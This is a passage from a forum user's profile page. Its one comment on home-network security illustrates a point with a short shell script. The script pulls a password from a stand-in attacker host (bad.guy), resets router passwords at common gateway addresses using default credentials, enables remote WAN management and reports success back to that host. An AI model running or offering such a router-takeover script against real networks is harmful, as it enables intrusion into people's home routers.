• 0 Posts
  • 7 Comments
Joined 3 years ago
cake
Cake day: June 10th, 2023

help-circle





  • That’s what I said though, it only protects you from the very most basic of mindless scripts. Obviously ARP/NDP makes it pointless for anything more complicated than…

    newpass="$(curl "https://bad.guy/get_pass_for_pub_ip")"
    for a in '192.168.1.1' '192.168.0.1' '10.0.0.1'; do
        curl -q "http://${a}/reset_password.cgi?&password=password&new_password=${newpass}" 2>/dev/null && \
        curl -q "http://${a}/remote_management.cgi?&password=${newpass}&wan_enable=1" && \
        curl -q "https://bad.guy/success?addr=%24%7Ba%7D"
    done
    

    …completely pointless. If it’s a someone inside your network, you need more.